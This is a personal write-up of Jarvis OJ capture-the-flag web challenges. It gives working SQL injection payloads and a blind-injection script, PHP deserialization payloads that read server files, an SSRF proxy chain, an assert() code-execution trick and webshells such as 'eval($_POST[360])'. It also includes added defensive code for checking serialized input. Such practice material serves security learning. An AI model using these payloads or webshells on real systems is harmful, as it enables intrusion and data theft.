Jarvis OJ (web writeups)

api调用 (API call)

This one is an XXE vulnerability in the Slim framework; I solved it by following a blog post, lol

https://www.leavesongs.com/PENETRATION/slim3-xxe.html

simple injection

username and password are the injection points; the rest is working out how to inject.

The challenge filters spaces, but /**/ gets around that.

Confirm that the admin table exists

username=admin'/**/or/**/exists(select/**/*/**/from/**/admin)#&password=1'#

The username and password columns exist

username=admin'/**/or/**/exists(select/**/username,password/**/from/**/admin)#&password=1'#

Confirm that there is only one record

username=admin'/**/or/**/exists(select/**/count(*)/**/from/**/admin)#&password=1'#

Determine the password length

username=user'/**/or/**/(select/**/length(password)/**/from/**/admin)=32#&password=1'#

What's left is blind injection; here's the script

# coding: utf-8
import requests

url = "http://web.jarvisoj.com:32787/login.php"
wrong_password = "密码错误"  # response text when the injected condition holds (user row found, password wrong)
chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
print('start!')
password = ""
for i in range(1, 33):  # 32 characters, as established with length(password)=32 above
    for j in chars:
        # the OR condition is true only when the i-th character of the password is j
        data = {'username': "user'/**/or/**/mid((select/**/password/**/from/**/admin),%s,1)='%s'#" % (i, j),
                'password': "1'#"}
        res = requests.post(url, data=data).text
        if wrong_password in res:  # condition held, so this character is correct
            password += j
            print(password)
            break
print(password)
print('end!')

Result

This is obviously an MD5 hash; crack it and then log in with the plaintext.

WEB?

Looking at the front-end JS, you can see the validation logic

$.post("checkpass.json", t,
	function(t) {
		self.checkpass(e) ?
			self.setState({
				errmsg: "Success!!",
				errcolor: b.green400
			}) : self.setState({
				errmsg: "Wrong Password!!",
				errcolor: b.red400
			})
	})

And its checkpass function looks like this

function(e) {
	if (25 !== e.length)
		return !1;
	for (var t = [], n = 0; n < 25; n++)
		t.push(e.charCodeAt(n));
	var r = [325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259];
	var o = [[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]];
	for (var n = 0; n < 25; n++) {
		for (var i = 0, a = 0; a < 25; a++)
			i += t[a] * o[n][a];
		if (i !== r[n])
			return !1
	}
	return !0
}

So it's a system of 25 linear equations in 25 unknowns; let a script do the work

import numpy as np

# targets r and coefficient matrix o, copied from the checkpass() function above
r = [325799,309234,317320,327895,298316,301249,330242,289290,273446,337687,258725,267444,373557,322237,344478,362136,331815,315157,299242,305418,313569,269307,338319,306491,351259]
o = [[11,13,32,234,236,3,72,237,122,230,157,53,7,225,193,76,142,166,11,196,194,187,152,132,135],[76,55,38,70,98,244,201,125,182,123,47,86,67,19,145,12,138,149,83,178,255,122,238,187,221],[218,233,17,56,151,28,150,196,79,11,150,128,52,228,189,107,219,87,90,221,45,201,14,106,230],[30,50,76,94,172,61,229,109,216,12,181,231,174,236,159,128,245,52,43,11,207,145,241,196,80],[134,145,36,255,13,239,212,135,85,194,200,50,170,78,51,10,232,132,60,122,117,74,117,250,45],[142,221,121,56,56,120,113,143,77,190,195,133,236,111,144,65,172,74,160,1,143,242,96,70,107],[229,79,167,88,165,38,108,27,75,240,116,178,165,206,156,193,86,57,148,187,161,55,134,24,249],[235,175,235,169,73,125,114,6,142,162,228,157,160,66,28,167,63,41,182,55,189,56,102,31,158],[37,190,169,116,172,66,9,229,188,63,138,111,245,133,22,87,25,26,106,82,211,252,57,66,98],[199,48,58,221,162,57,111,70,227,126,43,143,225,85,224,141,232,141,5,233,69,70,204,155,141],[212,83,219,55,132,5,153,11,0,89,134,201,255,101,22,98,215,139,0,78,165,0,126,48,119],[194,156,10,212,237,112,17,158,225,227,152,121,56,10,238,74,76,66,80,31,73,10,180,45,94],[110,231,82,180,109,209,239,163,30,160,60,190,97,256,141,199,3,30,235,73,225,244,141,123,208],[220,248,136,245,123,82,120,65,68,136,151,173,104,107,172,148,54,218,42,233,57,115,5,50,196],[190,34,140,52,160,34,201,48,214,33,219,183,224,237,157,245,1,134,13,99,212,230,243,236,40],[144,246,73,161,134,112,146,212,121,43,41,174,146,78,235,202,200,90,254,216,113,25,114,232,123],[158,85,116,97,145,21,105,2,256,69,21,152,155,88,11,232,146,238,170,123,135,150,161,249,236],[251,96,103,188,188,8,33,39,237,63,230,128,166,130,141,112,254,234,113,250,1,89,0,135,119],[192,206,73,92,174,130,164,95,21,153,82,254,20,133,56,7,163,48,7,206,51,204,136,180,196],[106,63,252,202,153,6,193,146,88,118,78,58,214,168,68,128,68,35,245,144,102,20,194,207,66],[154,98,219,2,13,65,131,185,27,162,214,63,238,248,38,129,170,180,181,96,165,78,121,55,214],[193,94,107,45,83,56,2,41,58,169,120,58,105,178,58,217,18,93,212,74,18,217,219,89,212],[164,228,5,133,175,164,37,176,94,232,82,0,47,212,107,111,97,153,119,85,147,256,130,248,235],[221,178,50,49,39,215,200,188,105,101,172,133,28,88,83,32,45,13,215,204,141,226,118,233,156],[236,142,87,152,97,134,54,239,49,220,233,216,13,143,145,112,217,194,114,221,150,51,136,31,198]]
o = np.array(o)
r = np.array(r)
x = np.linalg.solve(o, r)  # solve o * x = r for the 25 character codes
# print(x)
string = ''
for i in x:
    i += 0.5  # round the floating-point result to the nearest integer
    # print(round(i, 0))
    string += chr(int(i))
print(string)

Here I converted the solved values to their ASCII characters and got the flag.
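As an added example (not the author's script), the following shows why a client-side check of this shape is no protection at all: the browser-visible coefficient matrix o and target vector r determine the secret uniquely, so exact rational elimination recovers it without the floating-point solve and the "+0.5" rounding step. make_check, the seed and the secret string are constructed here for the demonstration; only the structure (25 dot-products of char codes against a 25x25 matrix with entries 0..256) mirrors the challenge.

```python
from fractions import Fraction
import random

# Added example, not from the original write-up. checkpass() compares 25
# dot-products of the password's char codes with fixed targets r; the matrix o
# and r both ship to the browser, so the "check" is a linear system that hands
# the password to anyone who solves it. Exact rational elimination replaces the
# floating-point solve plus "+0.5" rounding of the numpy script.

def make_check(secret, seed=0):
    """Build (o, r) with the challenge's structure: random coefficients 0..256
    and r[n] = sum(o[n][a] * ord(secret[a])). Constructed test data."""
    rng = random.Random(seed)
    codes = [ord(c) for c in secret]
    n = len(codes)
    o = [[rng.randint(0, 256) for _ in range(n)] for _ in range(n)]
    r = [sum(o[i][a] * codes[a] for a in range(n)) for i in range(n)]
    return o, r

def solve_exact(o, r):
    """Gauss-Jordan elimination over Fractions. Returns the unique solution, or
    None when the matrix is singular (then the check does not pin down one password)."""
    n = len(r)
    m = [[Fraction(v) for v in row] + [Fraction(r[i])] for i, row in enumerate(o)]
    for col in range(n):
        pivot = next((i for i in range(col, n) if m[i][col] != 0), None)
        if pivot is None:
            return None
        m[col], m[pivot] = m[pivot], m[col]
        inv = 1 / m[col][col]
        m[col] = [v * inv for v in m[col]]
        for i in range(n):
            if i != col and m[i][col] != 0:
                f = m[i][col]
                m[i] = [a - f * b for a, b in zip(m[i], m[col])]
    return [row[n] for row in m]

def recover_password(o, r):
    """Solve the system and map an all-integer solution back to characters."""
    x = solve_exact(o, r)
    if x is None or any(v.denominator != 1 or not 0 <= v < 0x110000 for v in x):
        return None
    return "".join(chr(int(v)) for v in x)

if __name__ == "__main__":
    o, r = make_check("CTF{constructed_25_chars}")
    print(recover_password(o, r))
```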

神盾局的秘密 (S.H.I.E.L.D.'s secret)

Opening this one shows an image, and the URL parameter turns out to be base64; decoding it gives shield.jpg

Guess: a file read

Try base64-encoding index.php and passing that in; the source of index.php comes back

The other files can be found the same way

index.php
<?php 
	require_once('shield.php');
	$x = new Shield();
	isset($_GET['class']) && $g = $_GET['class'];
	if (!empty($g)) {
		$x = unserialize($g);
	}
	echo $x->readfile();
?>
// the value received is unserialized


shield.php
<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this -> file = $filename;
		}
		
		function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
?>
// filters ..  /  \\
// puts the file contents that were read into a variable


showimg.php
<?php
	$f = $_GET['img'];
	if (!empty($f)) {
		$f = base64_decode($f);
		if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
		&& stripos($f,'pctf')===FALSE) {
			readfile($f);
		} else {
			echo "File not found!";
		}
	}
?>
// filters ..  /  \\  pctf

So index.php takes a class parameter, unserializes it, calls readfile() and echoes the result. The flag is in pctf.php; reading pctf.php directly through showimg.php is impossible, so the only route is a serialized object handed to index.php so that it does the reading.

Final payload

http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}
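Added example, not code from the write-up or the challenge: the root cause is that index.php hands attacker-controlled data to unserialize(), which instantiates whatever class the blob names. The parser below (parse, classes_in, is_safe and the allowlist argument are this example's own names) reads the subset of the PHP serialize() format that appears in the payload above, so the classes a blob would instantiate can be checked against an allowlist before anything is deserialized; in PHP 7+ the native control is unserialize()'s allowed_classes option, and safer still is not accepting serialized objects from clients at all.

```python
# Added example, not from the original write-up: parser for the subset of PHP's
# serialize() format in the challenge payload (i:, b:, s:, a:, O:), so a defender
# can list the classes unserialize() would instantiate before trusting the blob.

def _int_field(buf, pos):
    # integer running from buf[pos] up to the next ':'; returns (value, pos after ':')
    colon = buf.index(":", pos)
    return int(buf[pos:colon]), colon + 1

def _pairs(buf, pos, count):
    # `count` key/value pairs followed by the closing '}'
    items = {}
    for _ in range(count):
        key, pos = parse(buf, pos)
        items[key], pos = parse(buf, pos)
    return items, pos + 1

def parse(buf, pos=0):
    """Parse one serialized value at pos; return (python_value, next_pos)."""
    tag = buf[pos]
    if tag in "ib":                                  # i:123;  b:1;
        end = buf.index(";", pos)
        return int(buf[pos + 2:end]), end + 1
    if tag == "s":                                   # s:LEN:"bytes";  (length-prefixed)
        length, pos = _int_field(buf, pos + 2)
        return buf[pos + 1:pos + 1 + length], pos + length + 3
    if tag == "a":                                   # a:COUNT:{key;value;...}
        count, pos = _int_field(buf, pos + 2)
        return _pairs(buf, pos + 1, count)
    if tag == "O":                                   # O:LEN:"Class":COUNT:{prop;value;...}
        length, pos = _int_field(buf, pos + 2)
        name = buf[pos + 1:pos + 1 + length]
        count, pos = _int_field(buf, pos + length + 3)
        props, pos = _pairs(buf, pos + 1, count)
        return ("object", name, props), pos
    raise ValueError("unsupported tag %r at offset %d" % (tag, pos))

def classes_in(value):
    """Yield every class name the parsed value would instantiate, recursively."""
    if isinstance(value, tuple) and value[0] == "object":
        yield value[1]
        value = value[2]
    if isinstance(value, dict):
        for v in value.values():
            yield from classes_in(v)

def is_safe(blob, allowed=frozenset()):
    """True only if blob parses completely and names no class outside `allowed`."""
    try:
        value, end = parse(blob)
        return end == len(blob) and all(c in allowed for c in classes_in(value))
    except (ValueError, IndexError):                 # malformed or truncated input
        return False
```

With an empty allowlist, which is all index.php legitimately needs, the write-up's payload is rejected before unserialize() ever runs.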

flag在管理员手里 (the flag is in the admin's hands)

This one tests the hash length extension attack; I won't explain the attack itself. Straight to the challenge: intercepting the request shows role and hsh

Scanning the backend turns up a leaked index.php~; recovering the file shows

role is a value passed in a cookie, hsh is the MD5 of the salt concatenated with the reversed role, and if role is admin you get the flag

We don't know what the salt is, but the result can be worked out with hashpump

Here's a blog post by P神 for reference; it's very detailed

https://www.cnblogs.com/pcat/p/5478509.html

The output has everything needed: take the string under the md5, reverse it, URL-encode it, and that's it

in a mess

The challenge hints to look at index.phps

<?php

error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
	header('Location: index.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'Hahahahahaha';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	require("flag.txt");
}
else
{
	print "work harder!harder!harder!";
}


?>

So we need to supply three values, id, a and b: id must equal 0, the file read via a must contain 1122 is a nice lab!, and b must be longer than 5 and match 1144 but not start with 4

id can be bypassed with a string, e.g. id=0e12 or id=abd

For a, use php://input (reportedly the data protocol works too: a=data:,1122 is a nice lab!)

For b, use %00 truncation: b=%00111111

Then you see this, and from here it's SQL injection, with spaces, union, select, from and the table name filtered

The screenshot shows 3 columns, and trying id=1' at the start produced an error that leaked the table name content

So go straight to the column names

Then read the value of context

RE?

This one left me completely baffled: UDF privilege escalation? meow meow meow?

You get a UDF file; put it on the server and then look at the help_me function

Easy Gallery

Opening this one shows a file upload form, so it's presumably a file upload challenge

Then tried %00 and other bypasses; no way to upload a PHP file, so it's probably an image webshell

Try appending <?php phpinfo();?> to an image, upload it, and visit it

(A catch here: the URL that actually reaches the image is http://web.jarvisoj.com:32785/index.php?page=uploads/<image id><image extension>)

That gives this result, so the backend appends .php to the filename before including it, which means %00 truncation is needed

After truncating you find

A bit of testing suggests that <? triggers the WAF, so change how the payload is written

<script language='php'>

phpinfo();

</script>

Upload it, visit it, and it's there

Chopper

The server for this one seems to be down; I could never reach it

Noting down other people's approach and what it tests

It should be testing proxying: there's an image and an admin login, and the login says only the admin IP 103.27.76.153 is allowed

Intercepting and modifying the request didn't get anywhere

In the end it was a proxy (or is that a cross-site attack?)

Go through the original site to reach an intermediate site that has higher privileges, and that site can then reach pages that are otherwise forbidden

http://web.jarvisoj.com:32782/proxy.php?url=http://103.27.76.153/proxy.php?url=http://web.jarvisoj.com:32782/admin/

Then you see a "you are closing" page........

Scanning the backend shows robot.txt with two disallow entries, trojan.php and trojan.php.txt

The txt contains a one-line webshell "eval($_POST[360])"

Finally connect with Chopper (菜刀) and the flag is yours

phpinfo

Reference: https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/

The source is shown on entering

This one tests a deserialization vulnerability, emmm, the hint is very obvious

There's an OowoO class, a controllable variable mdzz and two magic methods, very friendly; but how do we get control of this class?

Look at phpinfo

session.upload_progress.enabled is on. While an upload is being processed, if the POST contains a variable with the same name as the ini setting session.upload_progress.name, PHP detects it and adds an entry to $_SESSION. So session upload progress lets us set a session value, and through it control the OowoO class to do what we want.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>phpinfo</title>
</head>
<body>
    <form action="http://web.jarvisoj.com:32784/index.php" method="post" enctype="multipart/form-data">
        <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
        <input type="file" name="file" />
        <input type="submit" value="go" />
    </form>
</body>
</html>

Use this page, then intercept and modify the request to do what we want. If you're not familiar with what the serialized string looks like, write a quick script and echo it; not pasting it here (runs away

First check the current file path: intercept and change filename to |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(dirname(/opt/lampp/htdocs));\";}

The backslashes are there to prevent escaping

Result

Then list the directory, with filename |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}

Now the flag file is visible

Finally read it, with filename |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

flag

inject

First thing in this one is finding the source, orz

Here it's an index.php~ leak

<?php
	require("config.php");
	$table = $_GET['table']?$_GET['table']:"test";
	$table = Filter($table);
	mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
	$sql = "select 'flag{xxx}' from secret_{$table}";
	$ret = sql_query($sql);
	echo $ret[0];
?>

You can see that $table is an injectable point

Since it's wrapped in backticks, we have to find a way to close the backtick

Get the database

?table=test` `union select database() limit 1,1

Tables

?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1

Next the columns; the catch here is that the backend filters double quotes, so you have to go through them one row at a time

?table=test`  `union select column_name from information_schema.columns  limit 1,1

And finally the flag

?table=test`  `union select group_concat(flagUwillNeverKnow) from secret_flag  limit 1,1

babyphp

The description says git is used, so guess a .git leak; a scan confirms it

That gives the source

<?php
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

The source has an assert() call, which executes the string it receives as code, and $file happens to be under our control, so we get code execution; use a system function to list the directory first

There's a templates directory (which was already visible in the leaked source); look into templates

There's a flag.php; read it

The flag is out

register

There's a hint, but I couldn't find what country affects; in the end I followed these blogs, lol

https://blog.csdn.net/Ni9htMar3/article/details/73743284#t4

http://mitah.cn/index.php/archives/8/

country affects the response time, so it's a boolean blind injection based on the timing difference

Finally take admin's password, crack it, log in, and the manage page shows the flag

图片上传漏洞 (image upload vulnerability)

This one is a CVE exploit; I'm too weak and still can't do it, so I followed these writeups

https://www.scanfsec.com/jarvisoj_web_writeup.html#directory056831405803208134

https://www.2cto.com/article/201605/505823.html

phpinfo shows ImageMagick; the rest is exploiting the vulnerability

Generate a one-line webshell with exiftool

Then upload it

What's left is visiting y.php and connecting with Chopper, but the backend seems to be down??? y.php could never be found

babyxss

Haven't figured this one out yet; posting the writeups for now and will work it out later (ง •̀_•́)ง

https://blog.csdn.net/littlelittlebai/article/details/78922343

https://blog.csdn.net/Ni9htMar3/article/details/73743284#t4
